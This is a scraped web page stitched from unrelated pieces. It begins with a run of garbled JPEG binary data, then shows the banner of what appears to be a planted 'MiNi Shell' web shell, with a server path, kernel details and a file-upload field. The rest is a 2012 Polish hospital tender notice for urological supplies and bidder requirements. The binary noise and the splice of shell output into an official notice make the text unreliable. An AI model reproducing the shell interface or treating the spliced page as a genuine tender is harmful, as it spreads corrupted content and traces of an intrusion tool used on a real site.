JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120413/116722-N-2012.html

<p class="kh_header"><b>Włocławek: DIZ-31-2012  DOSTAWA SPRZĘTU UROLOGICZNEGO</b><br>
<b>Numer ogłoszenia: 116722 - 2012; data zamieszczenia: 13.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ-31-2012  DOSTAWA SPRZĘTU UROLOGICZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu  zamówienia.
1.Przedmiotem zamówienia jest DOSTAWE SPRZĘTU UROLOGICZNEGO opisanego poniżej:

Zadanie 1   IGŁY DO BIOPSJI STERCZA
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Igły do biopsji stercza do aparatu Magnum BARD, sterylne pakowane pojedynczo	18G x  dł. 25 cm	Szt.	720


Zadanie 2   CEWNIKI  UROLOGICZNE TYPU COUVELAIRE
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	10 Ch x dł. 400 mm	Szt.	312
B	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	12 Ch x dł. 400 mm	Szt.	312
C	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	14 Ch x dł. 400 mm	Szt.	312
D	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	16 Ch x dł. 400 mm	Szt.	192
E	Cewniki urologiczne typu COUVELAIRE, jednorazowe, jałowe, pakowane pojedynczo	18 Ch x dł. 400 mm	Szt.	192


Zadanie 3   CEWNIKI  UROLOGICZNE TYPU TIEMANN
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	10 Ch x dł. 400 mm	Szt.	24
B	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	12 Ch x dł. 400 mm	Szt.	24
C	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	14 Ch x dł. 400 mm	Szt.	24
D	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	16 Ch x dł. 400 mm	Szt.	24
E	Cewniki urologiczne typu TIEMANN, jednorazowe, jałowe, pakowane pojedynczo	18 Ch x dł. 400 mm	Szt.	24

Zadanie 4  ŁĄCZNIK DWUBIEŻNY TYPU  LS
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Łącznik dwubieżny typu LS - Luer Lock, sterylny, pakowany pojedynczo		Szt.	600

Zadanie 5  ZESTAW PODSTAWOWY DO NADŁONOWEGO DRENAŻU PĘCHERZA MOCZOWEGO Z CEWNIKIEM      WYKONANYM  PUR
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Zestaw A:
- igła 3,6 mm rozrywalna,
- długość igły 120 mm,
- cewnik 10 Ch ( tzn. pigtail),
- długość cewnika 650 mm
- znacznik na długości 90-130-190 mm	10 Ch	Szt.	80
B	Zestaw B:
- igła 5,6 mm rozrywalna,
- długość igły  120 mm,
- cewnik 15 Ch ( tzn. pigtail) 
- długość cewnika  650 mm
- znacznik na długości 130-280 mm	15 Ch	Szt.	80


Zadane 6  ZESTAW MOCZOWODOWY TYPU DOUBLE PIGTAIL
l.p.	Nazwa asortymentu	rozmiar
(Długość  między pętlami)	j.m.	Zamawiana ilość
Na 2 lata
A	Zestaw moczowodowy typu Double Pigtail
 średnica 6 Ch
Parametry graniczne
- cewnik wykonany z poliuretanu, zakończony od strony pęcherzowej śródosiowym klikiem, kompatybilnym z popychaczem,
- znaczniki co 1 cm wokół całej średnicy,
- prowadnik z pokryciem PTFE z elastyczną końcówką z funkcja zmiękczania,
- popychacz o dł. około 45 cm, zacisk,
- popychacz załączony do zestawu wyposażony w śródosiowy klik i funkcję sterowania ułożeniem cewnika poprzez jego przesuwanie przód - tył i obracanie,
- zakończenie cewnika otwarte - zamknięte	
24 cm	Szt.        48
		

26 cm	Szt.	48
		

28 cm	Szt.	48
				
B
	Zestaw moczowodowy typu Double Pigtail do zastosowania z uretrorenoskopem
średnica 4,5 - 4,8 Ch
Parametry graniczne
- cewnik wykonany z poliuretanu
- znaczniki co 1 cm wokół całej średnicy,
- prowadnik o śr. 0,028 z pokryciem PTFE z elastyczną końcówką z funkcją  zmiękczania, dł 150 cm
- popychacz o dł. min. 80 cm, 
- popychacz załączony do zestawu wyposażony w śródosiowy klik i funkcję sterowania ułożeniem cewnika poprzez jego przesuwanie przód - tył i obracanie przy dł. 26-28 cm,
- zakończenie cewnika otwarte - zamknięte	

22 cm	Szt. 48
		
24 cm    Szt.  48
		
26 cm    Szt.  48
28 cm	szt. 48
				
C	Zestaw moczowodowy typu Double Pigtail do zastosowania z uretrorenoskopem 
średnica 4,8 Ch
Parametry graniczne
- cewnik wykonany z materiału innego niż  poliuretan, z wewnętrzną warstwa utwardzaną,
- przepływ wewnętrzny cewnika min. 0,035,
- znaczniki wokół całej średnicy co 5 cm,
- prowadnik o śr. 0,035 z pokryciem PTFE z elastyczną końcówką dł 150 cm
- popychacz o dł. min. 70 cm, 
- popychacz załączony do zestawu wyposażony w zacisk  i funkcję sterowania ułożeniem cewnika poprzez jego przesuwanie przód - tył i obracanie możliwość repozycji nawet po wyjęciu prowadnicy,
- zakończenie cewnika otwarte - zamknięte	22 cm	Szt.	24


Zadane 7   DRUT PROWADZĄCY PROSTY ZE STALI CHIRURGICZNEJ 
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Drut prowadzący prosty ze stali chirurgicznej 
typu GUIDE
Parametry graniczne
- pokryty PTFE do URS,
- o średnicy 0,028 (0,71m )
- f. ch 5+6
- z funkcją zmiękczania 
- dlugość 150 cm
- drut w plastikowym dyspenserze,
- jednorazowa , sterylna pojedynczo pakowana		Szt.	432


Zadane 8  CEWNIK OPERACYJNY TYPU COUVELIERE
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik operacyjny typu COUVELIERE

Parametry graniczne
- trójdrożny, 
- z linią RTG  na całej długości
- wykonany z medycznego PCV
- przezroczysty,
- balon 30 ml	16Ch	Szt.	20
		18Ch	Szt.	40
		20Ch	Szt.	40


Zadanie 9  CEWNIK POOPERACYJNY TYPU DUFOUR
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik pooperacyjny typu DUFOUR

Parametry graniczne
- z czerwonej gumy,
- typu Robusta
- pokryty lateksem
- dwudrożny
- 2 oczka na przemian ległe
- balon 50 ml
- długość około 40 cm	16Ch	Szt.	40
		18Ch	Szt.	40
		20Ch	Szt.	40

Zadanie 10 CEWNIK POOPERACYJNY TYPU DUFOUR
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik pooperacyjny typu DUFOUR

Parametry graniczne
- z czerwonej gumy,
- typu Robusta
- pokryty lateksem
- trójdrożny
- 2 oczka na przemian ległe
- balon 50 ml
- długość około 40 cm	16Ch	Szt.	20
		18Ch	Szt.	20
		20Ch	Szt.	20


Zadanie 11 CEWNIK POOPERACYJNY TYPU TIEMANN
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Cewnik pooperacyjny typu TIEMANN
Parametry graniczne
- z czerwonej gumy
- typ Robusta
- pokryty lateksem
- dwudrożny
- 1 oczko
- balon 30-50 ml
- długość ok. 40 cm	14 Ch	Szt.	20
		16Ch	Szt.	20
		18Ch	Szt.	20
		20Ch	Szt.	20

Zadanie 12 Zestaw do PLNC 
l.p.	Nazwa asortymentu	rozmiar	j.m.	Zamawiana ilość
Na 2 lata
A	Igła trzyczęściowa
Parametry graniczne
- zakończona szlifem w postaci trzech pierścieni widocznych w USG
- minimalny przepływ do aplikacji prowadnicy o średnicy 0,038
- kompatybilna z drutem określonym w poz. B	
17,5 G 
dł.  20cm	
Szt.	
192
B	Drut prowadzący 0,038 typ Linderquist
Parametry graniczne
- usztywniana
- zakończenie J bezpieczne zmiękczone
- pokryty PTFE
- długość do wyboru 80 cm, 100 cm, 120 cm
- kompatybilny z igłą trzyczęściową określoną w poz. A		
Szt.	
192.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o  których mowa w  art.  67 ust. 1 pkt   7  ustawy prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.50.00-2, 33.14.14.00-2, 33.14.12.40-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w tym postępowaniu nie będzie wymagał od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące :
1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania;
2. posiadania wiedzy i doświadczenia;
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
     wykonania  zamówienia;
4. sytuacji ekonomicznej i finansowej;

1. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 1  Zamawiający   
     żąda  następujących dokumentów:

      a.  koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjecie  działalności  gospodarczej w zakresie objętym zamówieniem;

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 2   Zamawiający żąda   złożenia  następujących dokumentów:

a.	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw sprzętu medycznego w zakresie objętym przedmiotem zamówienia w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz z załączeniem dokumentu  potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie- co najmniej 3 dostawy za   łączną wartość brutto 100 000,00 zł:  zgodnie  z Załącznikiem nr 5  do niniejszej   specyfikacji;

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 3  Zamawiający żąda   złożenia następujących dokumentów:

a. pisemne oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami  zdolnymi do wykonania zamówienia;

b. w przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca   zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  okres korzystania z  nich przy wykonaniu zamówienia.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 3  Zamawiający 
     żąda   złożenia następujących dokumentów:

a. pisemne oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami  zdolnymi do wykonania zamówienia;

b. w przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca  zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  okres korzystania z nich przy wykonaniu zamówienia.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4. Celem potwierdzenia warunku określonego w rozdziale V pkt 4 Zamawiający żąda  złożenia  następujących dokumentów:
a. pisemne oświadczenie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  deliktowej i   kontraktowej w zakresie wykonywanej działalności gospodarczej.

Zamawiający dokona oceny spełnienia powyżej wymienionych  warunków na podstawie  złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, wymienionych w Rozdziale VI niniejszej specyfikacji w systemie spełnia-nie spełnia.
Wszystkie warunki wymienione w Rozdziale V muszą być spełnione łącznie.
Zamawiający dokona wyboru oferty spośród ofert nie podlegających odrzuceniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">5. W celu wykazania braku podstaw do wykluczenia z postępowania, o których mowa w art. 24  ust.1  pzp,  Zamawiający żąda złożenia następujących dokumentów:

a.oświadczenie o braku podstaw do wykluczenia z postępowania;

b. aktualny  odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w  stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;

6.  Celem potwierdzenia, że oferowana dostawa odpowiada opisowi przedmiotu 
      zamówienia   Zamawiający żąda:
a. dokumentu potwierdzającego dopuszczenie przedmiotu zamówienia do obrotu i  stosowania w   Polsce  zgodnie z  obowiązującymi Dyrektywami UE i zgodnie z  wymaganiami ustawy dnia   20.05.2010 r. o wyrobach medycznych (Dz. U. nr 107 poz. 679).   CE tzn.   Wykonawca winien  
    przedstawić jeden z dokumentów   dotyczących   wyrobu:
-	deklarację zgodności i oznaczenie znakiem zgodności CE,
-	świadectwo rejestracji lub świadectwo dopuszczenia do obrotu 
-	świadectwo jakości lub też świadectwo dopuszczenia do stosowania 
-	pozytywną opinię o wyrobie medycznym.
W przypadku, kiedy zaproponowany asortyment nie wymaga dokumentu w/w należy załączyć oświadczenie.

b. katalogi, foldery, materiały źródłowe producenta / w j. polskim/ - dla oferowanego   sprzętu,
c. W celu określenia przydatności asortymentu do użycia oraz celem obiektywnego  i  równego traktowania podmiotów,  Wykonawca zobowiązany jest  bezpłatnie  dostarczyć  próbki oferowanego  asortymentu z   ważnym terminem  przydatności  do zużycia (co najmniej 6 m-cy).

Wymagana  ilość  próbek określona jest w formularzu asortymentowo-cenowym.
Każdy oferowany asortyment musi posiadać  opis w języku  polskim.

7. Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest do  złożenia niżej   wymienionych dokumentów:

a. wypełniony i podpisany Druk ofertowy, zgodnie z  Załącznikiem nr 1 oraz Formularz asortymentowo-cenowy, zgodnie  z Załącznikami nr 1.1.-1.12. do niniejszej  specyfikacji;
b. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 do  niniejszej specyfikacji;
c. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z  Załącznikiem nr 3 ;
e. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 4 do niniejszej  specyfikacji;
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w  przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych ;  

Wszystkie dokumenty muszą być złożone w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  TAJNE. W tym celu należy również wypełnić Załącznik nr 6 do niniejszej specyfikacji.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - jakość - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia, które zostaną wprowadzone do treści  zawieranej  umowy w sprawie zamówienia publicznego, ogólne   warunki umowy

1.  Dopuszcza się możliwość zmiany umowy w postaci aneksu w przypadku kiedy zmiana ta będzie   korzystna dla zamawiającego lub gdyby zamawiający miał ponieść niewspółmierną stratę  przez   zaniechanie zmiany, tj. 
a.w sytuacji gdy zostanie wprowadzony do sprzedaży przez Producenta zmodyfikowany -  udoskonalony  produkt powodujący wycofanie dotychczasowego,
